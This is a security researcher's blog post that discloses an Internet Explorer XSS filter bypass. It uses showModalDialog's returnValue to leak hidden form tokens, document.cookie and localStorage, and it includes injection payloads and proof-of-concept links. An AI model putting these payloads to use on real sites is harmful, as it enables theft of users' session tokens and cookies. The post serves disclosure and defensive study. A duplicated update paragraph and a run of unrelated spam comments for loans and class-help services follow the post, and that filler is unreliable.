Also I will continue to write in Japanese as until now: http://masatokinugawa.l0.cm/
Today, I want to share IE's XSS filter bypass with showModalDialog.
showModalDialog function is old and has been removed from the web standards, but it has unique mechanism. I thought it might make my day. That's why I started looking into it.
The function is still supported by IE, Firefox and Safari.
First of all, let's recap usage of showModalDialog.
The first argument is URL which you want to open in the modal dialog.
The second argument is the argument which you want to pass to the modal dialog. And you can use it through window.dialogArguments property in the modal window.
To pass argument through window.dialogArguments, it seems that two windows must be same origin.
But it is different in case of returnValue. Two windows don't have to be same origin in Safari and IE. (Only Firefox needs same origin)
Here is my test page:
http://vulnerabledoma.in/showModalDialog/opener.html
Safari can pass it to different origin simply. Please test from the "x-origin" button.
To reproduce on IE, we need 3xx redirect. Please test from the "x-origin(redirect)" button.
This behavior means that we can pass information to another origin's page via returnValue property in Safari and IE. It might make a hole in some web application. But of course, I don't want to enlighten secure usage of showModalDialog in 2015 :)
Let's go to the main, bypass IE's XSS filter.
Exploitable Conditions:
- XSS exists in string literal of JS.
- Any JS property contains sensitive information.
The following is my test page:
http://vulnerabledoma.in/xss_token?q=[XSS_HERE]
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="[XSS_HERE]"</script>
Seeing is believing. Please go to the following PoC using IE:
http://l0.cm/xssfilter_bypass/showModalDialog.html
If it goes well, you can see token strings in alert when you closed the modal dialog.
Let's take a look at details. The redirect takes you to:
http://vulnerabledoma.in/xss_token?q=%22%3BreturnValue=form.token.value//
The payload is injected:
<form name=form>Then, the token is passed into returnValue. Yeah!!
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="";returnValue=form.token.value//"</script>
Needless to say, also it works:
";returnValue=document.cookie//
";returnValue=localStorage.key//
I have tried unsuccessfully to access other page's window object through window.opener. Any idea?
That's all. Understood? :)
FYI, I have blogged about some XSS filter bypass techniques in the past. (Sorry, Japanese text only)
If you are interested in other bypasses, please read using Google Translate.
ブラウザのXSS保護機能をバイパスする(1) (2012/2)
ブラウザのXSS保護機能をバイパスする(2) (2012/3)
ブラウザのXSS保護機能をバイパスする(3) (2012/9)
ブラウザのXSS保護機能をバイパスする(4) (2014/9)
ブラウザのXSS保護機能をバイパスする(5) (2014/10)
I'm going to continue to write blog in English as far as possible.
Thank you!
Update(2015/6/17)
I found a way to pass other same-origin page's information via returnValue.
Anyway please go to the following page and click the "go" button.
http://l0.cm/xssfilter_bypass/showModalDialog2.html
If it goes well, you can see "<h1>This is secret Text!</h1>" of other same-origin page's information in alert dialog. In this PoC, we don't need 3xx redirect. It seems that we can set returnValue from x-origin page in iframe which exists in showModalDialog.
Update(2015/6/17)
I found a way to pass other same-origin page's information via returnValue.
Anyway please go to the following page and click the "go" button.
http://l0.cm/xssfilter_bypass/showModalDialog2.html
If it goes well, you can see "<h1>This is secret Text!</h1>" of other same-origin page's information in alert dialog. In this PoC, we don't need 3xx redirect. It seems that we can set returnValue from x-origin page in iframe which exists in showModalDialog.
One call! Capable people who really tuned in and guided me through the credit application process. An exchange of messages and the next day, my development returns were in my record! I can't imagine a more direct, less complex, all the more straightforward knowledge.
ReplyDeletePersonal Loans for Bad credit
Loans for Bad credit
The association was basic and the underwriting was speedy. The credit official was especially master and heartfelt
ReplyDeleteOnline Loans for Bad credit
Loans for people with bad credit
Due to the Professionalism of the specialist, I had the choice to gain a Personal Loan.
ReplyDeleteCar Loans for Bad credit
Bad Credit Loans
The experience it was fundamental and easy to apply for a development. No issues, no mystery costs, incredibly capable.
ReplyDeleteBad Credit Loans Personal
Bad Credit Loans for people
Understanding these vulnerabilities is crucial for web developers and security professionals to better protect against such attacks. The X-XSS-Nightmare exploit underscores the importance of thorough code review, robust security testing, and staying updated on the latest security trends and patches. while diving into the intricacies of web security is captivating, I've also been busy preparing for exams, such as the GRE. Balancing study sessions with staying informed about cybersecurity developments can be challenging at times. There were moments when I felt overwhelmed and wished I could find someone to take my GRE exam for me, but I know that mastering these skills is essential for my future career.
ReplyDeleteCongratulations on starting your English blog, Masato! It's great to see you expanding your reach and sharing your knowledge across different languages. The topic you're exploring sounds intriguing—XSS filter bypass with showModalDialog. It's fascinating how even older functions like showModalDialog can still have significant implications. As we focus on our online exams, it's essential to stay informed about cybersecurity issues like XSS vulnerabilities. Thanks for sharing your insights—I'll be sure to check out your blog for more updates!
ReplyDeleteConnections offers a rich and rewarding experience for word game enthusiasts. By understanding the game’s patterns, expanding your vocabulary, and employing effective strategies, you can enhance your gameplay and achieve success.
ReplyDeleteEducation and lifelong learning are crucial components of modern nursing. The rapidly changing online class help services nature of healthcare means that nurses must continually update their knowledge and skills to keep pace with new developments. Many nurses pursue advanced degrees, certifications, and continuing education opportunities to enhance their expertise and stay current in their field. This commitment to professional development not only improves the quality of care that nurses provide but also opens up new career opportunities and pathways for advancement.
ReplyDeleteThe leadership role of nurses has also become more prominent in recent years. Nurses are increasingly taking on leadership positions within healthcare organizations, shaping policies, and driving quality improvement initiatives. Their unique perspective online class services as frontline caregivers gives them valuable insights into the challenges and opportunities within healthcare, making them effective leaders and change agents. Nursing leadership is essential in promoting a culture of safety, improving patient outcomes, and ensuring that healthcare systems operate efficiently and effectively.
ReplyDelete